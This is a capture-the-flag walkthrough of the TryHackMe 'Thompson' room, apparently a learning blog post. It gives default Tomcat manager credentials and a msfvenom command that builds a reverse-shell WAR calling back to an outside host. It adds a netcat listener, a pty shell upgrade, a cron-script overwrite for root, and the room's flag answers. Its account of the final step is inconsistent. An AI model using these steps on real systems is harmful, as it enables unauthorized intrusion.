Thompson-Walkthrough-TryHackMe
Dear friends, let us solve challenges in the Thompson box present in the below link.
Visit https://tryhackme.com/room/bsidesgtthompson and join the room.
VPN- 10.9.227.16
Attacker i/p- 10.10.117.170
Today I’m going to show you a Tomcat-related CTF challenge. This is a boo2root machine write-up by Guatemala. Let’s get started and explore vulnerabilities and exploits in this machine.
After hitting the deploy button, we now have our IP address (before starting, check whether the IP is live by pinging ).
Enumeration/Reconnaissance
I have used Nmap to check for open ports and services.
nmap -Pn -A 10.10.117.170
From the nmap scan result, we came to know that three ports are open, and they are 22/TCP ssh, 8009/TCP Apache Jserv, and 8080/TCP HTTP. Let’s check out port 8080 on the browser and click on Manager App.
I clicked on Manager App, and it required credentials.
When you cancel the authentication required pop-up, you will get the credentials within the 401 unauthorized page.
There you can see username: tomcat, password: s3cret
Using those credentials, I was able to log into the server.
Exploit
Before logging in, I had googled on the internet that there is exploitation, which is CVE-2017–12617. This exploitation is known as the WAR backdoor. There is numerous proof of concept of this vulnerability. To use this exploit, one must know the login credential of the manager page.
Things seemed pretty straightforward from here. First, we have to upload a malicious war file. I generated the war file using msfvenom. So, let’s upload the reverse shell (reverse shell was generated using msfvenom).
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.9.227.16 lport=4444 -f war -o shell.war
Set up a listener using netcat (you can use Metasploit ), uploaded the war file to the server, deployed in, and got a shell in our box
nc -lnvp 4444
Set up a listener using netcat (you can use Metasploit ), uploaded the war file to the server, deployed in, and got a shell in our box
We have a shell !!!!!! Sweet. Now I upgraded my shell to a fully interactive shell.
To get the interactive shell, we used the following spawning
python -c ‘import pty; pty.spawn(“/bin/bash”)’
39400c90bc683a41a8935e4719f181bf
Usually, the id.sh file is executed by root users, but it has responded to the test.txt file. Let’s check inside the crontab.
There’s a file called id at home. We do not own it, but we can write to it. Looking at the contents of the bash script. Now it’s time for privilege escalation. By now, you know the drill, uploading a script that checks for privilege escalation vectors and running it. The script that I normally use is linpeas.
We will fetch the root.txt flag from the root user by overwriting the id.sh using the command. I edited id.sh and replaced it with the following command
echo “cp /root/root.txt /home/jack/root.txt” > id. sh
What it essentially does is cat the root flag and the output stored in a file called test.txt
After some time, I ‘cat’ the contents of the test.txt, and boom, we have the root flag.
root.txt flag:
d89d5391984c0450a95497153ae7ca3a
Done!!!!!! Let us see the answers to the challenge questions now.
Task 1 Thompson
read user.txt and root.txt
Answer the questions below
user.txt
39400c90bc683a41a8935e4719f181bf
root.txt
d89d5391984c0450a95497153ae7ca3a
At last….We got user.txt and root.txt flags, and the Thompson room of tryhackme is completed. Thanks for reading, and I hope you enjoyed it too. As I always mention in every blog, suggestions are always welcome and open for discussion. Happy Hacking….
